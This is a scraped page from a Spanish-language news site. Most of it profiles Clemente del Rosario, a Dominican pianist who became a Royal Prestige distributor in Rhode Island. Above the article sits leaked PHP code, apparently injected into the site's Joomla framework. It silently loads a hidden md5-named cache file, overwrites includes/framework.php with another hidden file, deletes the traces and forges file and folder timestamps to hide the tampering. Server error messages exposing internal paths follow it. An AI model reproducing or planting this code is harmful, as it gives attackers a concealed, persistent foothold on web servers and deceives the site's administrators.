$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 426
Clemente del Rosario: De músico a empresario exitoso de Royal Prestige

ACONTECER LATINO

Tuesday, Sep 19th

Ultima actualizacion:06:42:24 AM GMT

Estas en: PRIMERA PLANA

Clemente del Rosario: De músico a empresario exitoso de Royal Prestige

Imprimir PDF

alt

PROVIDENCE, RI.- De ser un reconocido músico de la Fuerza Aérea Dominicana y director de orquesta en uno de los hoteles más prestigiosos de su país, Clemente del Rosario, quien hoy ostenta el Nivel I en la compañía Royal Prestige, se enfrentó, como cualquier inmigrante a su llegada a Estados Unidos, a una serie de obstáculos que amenazaban con hacer desvanecer sus sueños de ser independiente, exitoso, autosuficiente y un connotado pianista.

 

La historia del empresario hispano, pianista egresado del Conservatorio Nacional de Música en su natal Republica Dominicana, es digno ejemplo de que en la vida hay que tomar riesgos si se quiere llegar a la cima.

Clemente del Rosario emigró a este país en 1992. Sus planes eran dedicarse a la música y formar una orquesta. Pero el destino le depararía algo muy distinto. “Llegas aquí con planes, pero la realidad es otra. Quería dedicarme a la música, pero sorpresa, las cosas aquí no funcionan así. A veces los seres humanos no entendemos que el proceso toma tiempo y nos desesperamos, entonces viene el fracaso. Yo analice mis opciones, aceptaba el cambio y avanzaba, o me quedaba rezagado y dejaba de lado mis sueños. Pero yo no estaba dispuesto a renunciar”.

Del Rosario trabajó en una factoría y concomitantemente vendía comida a domicilio en el lugar. Luego se empleó como taxista, distribuidor de productos comestibles que entregaba a supermercados y bodegas, y también trabajó en un almacén, pero sin dejar de lado la música.

“Nada me detendría. Dios me ha dado muchos dones y talentos, por eso en mi rebeldía me negaba a estancarme, entonces tomaba la decisión de continua para alcanzar mis metas”, recuerda Clemente del Rosario.

Desempleado y decidido a luchar por sus objetivos, el laureado empresario inició la búsqueda de un nuevo empleo. “Compre un periódico y descubrí en los clasificados a Royal Prestige. Me encantó la compañía y aunque muchos me llamaban loco y hasta me criticaban por vender ollas y filtros, yo estaba convencido de que, después de la música, esto era lo que llenaría en lo adelante mi vida”.

Esto es una universidad de la vida, y lo que más me gusta es el crecimiento que la compañía te ofrece. Tú te involucras, te enfocas, te comprometes y trabajas con determinación y pasión. Nadie te puede agregar lo que tú no quieres. Tienes que abrir tu mente para crecer. La clave del éxito es esa. Pero lo más difícil es el proceso. Pero si aguantas el proceso logras llegar a la meta.

Clemente del Rosario define a Royal Prestige como una universidad de la vida, y señala que lo que más le gusta es el crecimiento que la compañía le ofrece a sus asociados. “Aquí nadie te puede agregar lo que tú no quieres. Tienes que abrir tu mente para crecer y cambiar la mentalidad de empleado, ahí radica el éxito. Lo más difícil es el proceso, pero si logras aguantar, veras la meta final”.

Aduce que “no tengo fortuna acumulada, pero gracias a Dios en diez anos que tengo en Royal Prestige, supero los 14 años que viví dando vueltas de un trabajo a otro en Nueva York. En Rhode Island encontré lo que busqué incansablemente, tengo un territorio y un equipo de trabajo bueno, disciplinado”.

El equipo de Clemente del Rosario incluye ocho distribuidores y aproximadamente 15 vendedores, la mayoría de los cuales están en camino de lograr su franquicia Royal Prestige. Y a pesar de lo exitoso que ha sido dentro de la compañía, el empresario dice aun no ha logrado alcanzar la meta. “Mi sueño es ser Master de Territorio. Actualmente soy nivel I, uno de los mejores dentro de las diferentes categorías de la compañía. Aun me faltan tres peldaños y voy a lograr escalarlos”.